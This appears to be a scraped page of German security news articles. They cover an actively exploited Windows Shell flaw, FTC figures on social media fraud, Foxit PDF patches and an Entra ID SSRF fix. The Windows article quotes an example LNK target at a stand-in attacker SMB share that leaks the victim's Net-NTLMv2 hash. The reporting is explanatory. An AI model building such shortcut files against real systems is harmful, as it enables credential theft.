Connect with us

Datenschutz & Sicherheit

Windows-Shell-Lücke wird angegriffen | heise online


Microsoft hat eine Sicherheitslücke in der Windows Shell zum Februar-Patchday ausgebessert – CVE-2026-21510, die von der Cybergang APT28 – besser unter dem Namen Fancy Bear bekannt – in freier Wildbahn angegriffen wurde. Der Patch war unzureichend und hinterließ eine weitere Sicherheitslücke. Und die wird nun ebenfalls im Internet attackiert.

Weiterlesen nach der Anzeige

Microsoft hat die neue Schwachstelle CVE-2026-32202 (CVSS 4.3, Risiko „mittel“) am April-Patchday mit Softwareflicken ausgebessert. Im Laufe des Montags haben die Entwickler den Schwachstelleneintrag jedoch aktualisiert: Die Spoofing-Lücke in der Windows Shell wird demzufolge inzwischen ebenfalls von bösartigen Akteuren in freier Wildbahn missbraucht. Die Auswirkungen scheinen nicht so gravierend wie vor dem unzureichenden Patch aus dem Februar.

Angreifer können einige sensible Informationen abgreifen, jedoch keine Informationen verändern oder Ressourcen blockieren. Microsoft erklärt weiter, dass ein Schutzmechanismus nicht korrekt greift, sodass bösartige Akteure Spoofing-Angriffe über das Netz ausführen können. Laut Microsoft müssen Opfer jedoch dazu eine bösartige Datei ausführen, die Angreifer ihnen zusenden. Die Installation des Updates vom Patchday schützt vor dem Missbrauch der Lücke.

Akamai hat im Blog jedoch eine weitergehende Analyse veröffentlicht. Die IT-Analysten stufen die neue Schwachstelle anders als Microsoft als Zero-Click-Schwachstelle ein. Rechner der Opfer authentifizieren sich dadurch am Server der Angreifer ohne Nutzerinteraktion. Der ursprüngliche Angriff ermöglichte die Ausführung von Schadcode aus dem Netz (RCE, Remote Code Execution). Der erste Patch blockierte unsignierte oder nicht vertrauenswürdige LNK-Dateien, die etwa auf CPL-Dateien verweisen, mittels SmartScreen. Allerdings haben die Programmierer eine Stelle im Codepfad übersehen: Der Windows Explorer versucht, aus Dateien wie .lnk für die Zieldatei – .cpl – ein Icon zu extrahieren. Und hier findet eine Pfadprüfung statt, mitsamt der Verbindung zu fremden SMB-Servern. Das passiert beim Anzeigen des Verzeichnisses, ohne weitere Klicks durch Nutzer.

Beispielhaft enthält die LNK-Datei eine Verknüpfung auf „\\attacker.com\share\payload.cpl“, wodurch der Rechner beim Auflisten des Verzeichnisses eine Verbindung zum SMB-Server „\\attacker.com\“ aufbaut und dabei eine automatische NTLM-Authentifizierung startet, wodurch der Net-NTLMv2-Hash des Opferrechners an die Angreifer gesendet wird. Der lasse sich dann in NTLM-Relay-Attacken und für Offline-Cracking missbrauchen, erklärt Akamai weiter.

Das heise-security-Pro-Webinar „Authentifizierung im Active Directory absichern: Mit Microsofts veralteten Konzepten (über)leben“ liefert Admins Handreichungen zur Absicherung mit vertiefenden Erklärungen und Hintergründen zu Net-NTLM.

Weiterlesen nach der Anzeige


(dmk)



Source link

Datenschutz & Sicherheit

Die meisten US-Betrugsfälle starten über Social Media


close notice

This article is also available in
English.

It was translated with technical assistance and editorially reviewed before publication.

Im vergangenen Jahr erbeuteten Betrüger in sozialen Netzwerken rund 2,1 Milliarden Dollar von US-Bürgern. Das geht aus einem Bericht der Federal Trade Commission (FTC) hervor, die unter anderem Betrugsmeldungen aus den USA sammelt und auswertet.

Weiterlesen nach der Anzeige

Laut der FTC verursachte Betrug über Social Media höhere Verluste als jeder andere Kontaktweg. Knapp 30 Prozent der durch Betrug Geschädigten gaben an, dass dieser auf sozialen Netzwerken begann. Die daraus entstehenden Verluste haben sich seit 2020 verachtfacht, schreibt die Behörde.

Soziale Netzwerke seien die erste Wahl für Betrüger, da sie von überall aus einen einfachen Zugang zu Milliarden von Menschen bieten und Betrug so mit minimalem Aufwand möglich machen. Die FTC schätzt, dass die tatsächlichen Verluste durch Betrug weit höher liegen, da längst nicht alle Betrugsfälle bei der Behörde gemeldet werden.

Die höchsten Verluste würden auf Kontakte entfallen, die über Facebook angebahnt wurden (siehe Diagramm unten). Die weiteren Meta-Plattformen wie WhatsApp und Instagram folgen mit großem Abstand auf den Plätzen zwei und drei. Auf anderen Plattformen wie Telegram, TikTok, LinkedIn und X findet laut Diagramm ebenfalls Betrug statt, aber in geringerem Ausmaß. Laut der FTC entstand allein auf Facebook ein größerer Betrugsschaden als durch Betrug per SMS oder E-Mail.

Die FTC nennt drei verbreitete Betrugsmuster in sozialen Netzwerken. Den größten finanziellen Schaden (1,1 Milliarden Dollar) verursachten Anlagebetrugsfälle. Solche Maschen beginnen oft mit Anzeigen oder Beiträgen, die beim Investieren helfen sollen, oder mit fingierten Beratern und manipulierten WhatsApp-Gruppen, die Erfolg vortäuschen.

Weiterlesen nach der Anzeige

Am weitesten verbreitet sind Fake-Shops und Kaufbetrug. Mehr als 40 Prozent derjenigen, die durch Betrug auf sozialen Netzwerken Geld verloren, gaben an, Produkte aus Social-Media-Anzeigen bestellt zu haben. Diese werden oft nicht geliefert oder stammen von gefälschten Shops, die bekannte Marken imitieren.


FTC-Diagramm der wichtigsten Kontaktwege für US-Betrugsfälle.

FTC-Diagramm der wichtigsten Kontaktwege für US-Betrugsfälle.

Das Diagramm zeigt die wichtigsten Kontaktwege für Betrug im Jahr 2025 nach gemeldeten Verlusten.

(Bild: FTC Data Spotlight)

Eine andere beliebte Masche ist der Liebesbetrug – und soziale Netzwerke spielen dabei eine zentrale Rolle: Fast 60 Prozent der Menschen, die 2025 durch Liebesbetrug Geld verloren, gaben an, der Kontakt habe auf einer Social-Media-Plattform begonnen. Täter sprechen hier gezielt Personen über deren Profile an, bauen Vertrauen auf und nutzen anschließend erfundene Notlagen oder vermeintliche Investmentchancen, um an Geld zu kommen. Andere Betrüger wiederum bringen Menschen dazu, intime Fotos zu senden, und drohen anschließend, diese an deren Social-Media-Kontakte zu senden, falls sie nicht zahlen.

Die FTC gibt basierend darauf naheliegende Tipps zur Vermeidung von Betrug: Nutzer sollten ihre Privatsphäre-Einstellungen einschränken, keine Anlageentscheidungen auf Basis reiner Online-Kontakte treffen und Anbieter vor dem Kauf online gezielt auf Betrugshinweise oder Beschwerden prüfen.


(tobe)



Source link

Weiterlesen

Datenschutz & Sicherheit

Schadcode-Lücken bedrohen Foxit PDF Reader und PDF Editor


Um möglichen Attacken unter Windows vorzubeugen, sollten Nutzer von Foxit PDF Reader und PDF Editor zeitnah die aktuellen Versionen installieren. Geschieht das nicht, können Angreifer an mehreren Sicherheitslücken ansetzen. Bislang gibt es seitens des Softwareherstellers keine Hinweise auf bereits laufende Attacken.

Weiterlesen nach der Anzeige

Im Sicherheitsbereich der Foxit-Website geben die Entwickler an, die Sicherheitsprobleme in Foxit PDF Reader 2026.1.1 und Foxit PDF Editor 2026.1.1/14.0.4 gelöst zu haben. Insgesamt haben sie sieben Softwareschwachstellen in den PDF-Anwendungen geschlossen. Von den Lücken sind ausschließlich Windows-PCs bedroht.

Nutzen Angreifer die Schwachstellen erfolgreich aus, können sie unter anderem DoS-Zustände und somit Abstürze auslösen (etwa CVE-2026-5938 „mittel“). Es kann aber auch zur Ausführung von Schadcode kommen (unter anderem CVE-2026-5943 „hoch“). Dafür müssen Angreifer Opfern aber eine präparierte XFA-Datei zukommen lassen, die dann geöffnet wird. Bei deren Verarbeitung mangelt es an Überprüfungen, sodass Schadcode auf Systeme gelangen kann.

Im vergangenen Dezember hatte Foxit ebenfalls hochriskante Sicherheitslücken in der Reader- und Editor-Software für macOS und Windows ausbessern müssen.


(des)



Source link

Weiterlesen

Datenschutz & Sicherheit

Microsoft stopft Lücke mit Risiko-Höchstwertung in Entra ID


close notice

This article is also available in
English.

It was translated with technical assistance and editorially reviewed before publication.

Im Cloud-basierten Identitätsverwaltungssystem Entra ID (Entitlement Management) hat Microsoft eine kritische Sicherheitslücke mit der höchsten Risikobewertung CVSS 10.0 von 10 geschlossen. Angreifer konnten die Lücke für Spoofing-Angriffe missbrauchen.

Weiterlesen nach der Anzeige

Microsoft hat eine Schwachstellenmeldung dazu veröffentlicht. Die Sicherheitslücke mit dem Eintrag CVE-2026-35431 (CVSS 10.0, Risiko „kritisch“) hat das Unternehmen demnach bereits im Laufe des vergangenen Donnerstags geschlossen. Es handelt sich um eine Server-Side-Request-Forgery (SSRF), wodurch Angreifer aus dem externen Netzwerk auf Ressourcen innerhalb des geschützten (lokalen) Netzwerkbereichs Zugriff erhalten. Unbefugte bösartige Akteure hätten dadurch Spoofing-Angriffe ausführen können.

Wie Angriffe genau aussehen würden und was genau Angreifer hätten spoofen können, erklärt Microsoft jedoch nicht. Die Höchstwertung des Risikos deutet jedoch darauf hin, dass offenbar das Kompromittieren von Netzwerken dadurch möglich war – und zwar recht unkompliziert.

Die Schwachstelle war zuvor laut Microsoft noch nicht öffentlich bekannt und auch noch nicht missbraucht worden. Admins und IT-Verantwortliche müssen zudem nicht aktiv werden, da die Mitarbeiter von Microsoft das Problem bereits serverseitig behoben haben.

Es ist nicht ungewöhnlich, dass Microsoft Sicherheitslücken in den Cloudsystemen schließt und dadurch automatisch die Kunden schützt. Anfang Februar hat das Unternehmen etwa in der Multi-Cloud-Verwaltungslösung Azure Arc, der serverlosen Entwicklungsumgebung Azure Functions und dem Content Delivery Network (CDN) Azure Front Door Sicherheitslecks gestopft. Eines galt ebenfalls als kritisches Risiko, zwei immerhin als hochriskant. Angreifer hätten sich dadurch etwa höhere Nutzerrechte erschleichen oder Zugriff auf eigentlich geschützte Informationen erlangen können.


(dmk)



Source link

Weiterlesen

Beliebt